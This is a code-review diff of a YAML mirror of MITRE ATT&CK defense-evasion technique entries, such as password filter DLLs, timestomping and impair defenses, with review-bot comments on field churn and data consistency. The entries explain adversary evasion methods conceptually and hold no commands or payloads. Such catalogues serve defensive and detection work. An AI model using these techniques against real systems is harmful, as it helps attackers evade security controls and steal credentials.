@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
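Review bot: most of this hunk is key reordering rather than content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here only to reappear at the end of the T1556.002 object in the next hunk, so a `modified` bump and a version change show up as a 36-line delete plus a 44-line add. If the generator can emit keys in a fixed order, the real changes (`x_mitre_version` `2.0` to `2.1`, dropped permissions) would be reviewable at a glance.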
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
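Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is removed from T1556.002 in this hunk without replacement, while T1600.001 and T1055.003 keep theirs later in the patch. Anything that filters techniques by required privilege loses the fact that registering a password filter DLL needs admin or SYSTEM; if the field is being retired together with the move to `x_mitre_attack_spec_version: 3.2.0`, state that, otherwise carry it over. Pre-existing but untouched here: the `x_mitre_detection` text still breaks the registry path across lines and leaves a stray `)` on a line of its own after `...\Lsa\Notification Packages`.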
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
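Review bot: T1600.001 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` in this hunk, which leaves it as one of the few technique objects in the file with no attack-spec version at all (the surrounding objects carry `2.1.0`, `3.1.0` or `3.2.0`). Unless the upstream object genuinely lacks the field, this looks like an over-broad delete; the same thing happens to T1055.003 further down.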
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
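Review bot: the T1202 description now covers Scriptrunner.exe and cites three new sources for it (`Secure Team - Scriptrunner.exe`, `SS64`, `Bleeping Computer - Scriptrunner.exe`), but `x_mitre_detection` in the same hunk is unchanged and still points only at forfiles via `(Citation: RSA Forfiles Aug 2017)`; if the detection text is maintained in this repository rather than taken verbatim from upstream, it should at least mention the new binary. Minor: the `twitter.com` to `x.com` URL rewrites also change the "Retrieved" dates from January 22, 2018 to September 12, 2024, so the references now record a 2024 retrieval of 2017 tweets; that is a link change, not new content, and should not be read as a source update.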
T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
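Review bot: the `description` block scalar for T1562 changes from `|-` (strip the final newline) to `|+` (keep all trailing newlines) in this hunk, so the parsed string will now end with one or more `\n` while every other description in the file is stripped. Any renderer or hash that compares descriptions will see a spurious difference; unless upstream deliberately wants trailing whitespace, keep `|-`. The merged second paragraph (logout, shutdown, update process, event aggregation, with the new `(Citation: Google Cloud Mandiant UNC3886 2024)`) reads fine.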
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
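Review bot: T1562's platform list drops `Office 365` and adds `Identity Provider` and `Office Suite` in this hunk (`x_mitre_version` `1.5` to `1.6`). Any per-platform index or filter keyed on the literal string `Office 365` will silently stop matching this technique, so those indexes need regenerating in the same change, and the two new platform names need entries wherever platforms are enumerated. The `x_mitre_modified_by_ref` line moving above `x_mitre_platforms` is ordering churn only.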
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
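Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a leading space inside its quoted `description` (`" Punsaen Boonyakarn, ..."`), which will render as a stray space before the author list; trim it here even if it came from upstream. The rest of the hunk is key movement: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are deleted at the bottom of the object because they were inserted near the top two hunks earlier, not because their values changed.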
T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
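Review bot: same over-broad delete as for T1600.001: T1055.003 loses `x_mitre_attack_spec_version: 2.1.0` in this hunk while keeping `x_mitre_permissions_required`, leaving the object without an attack-spec version. The T1036 `modified` bump from `2024-03-08` to `2024-10-16` in the same hunk is a genuine forward move and is fine.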
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
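Review bot: for T1070.008 two platforms, `Office 365` and `Google Workspace`, collapse into the single `Office Suite` value in this hunk, so the mapping is not one-to-one; a consumer that filtered this technique by either old name now loses it, and a Google Workspace-specific view in particular will no longer list mailbox manipulation unless it is taught that `Office Suite` covers it. Regenerate any platform-derived indexes together with this change rather than in a follow-up.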
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
